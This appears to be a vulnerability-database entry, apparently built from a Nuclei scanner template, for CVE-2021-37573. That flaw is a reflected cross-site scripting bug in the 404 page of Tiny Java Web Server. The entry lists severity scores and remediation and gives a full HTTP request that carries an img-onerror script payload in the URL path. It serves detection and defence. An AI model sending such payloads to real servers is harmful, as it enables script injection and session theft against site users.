| Title | Tiny Java Web Server - Cross-Site Scripting |
|---|---|
| Author | geeknik |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. |
| Remediation | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.18516 |
| CVE ID | CVE-2021-37573 |
| CWE ID | CWE-79 |
| Tags | cve2021 cve xss tjws java seclists tiny_java_web_server_project vuln |
A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server’s “404 Page not Found” error page.
GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-37573.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-37573.pcap
N/AN/A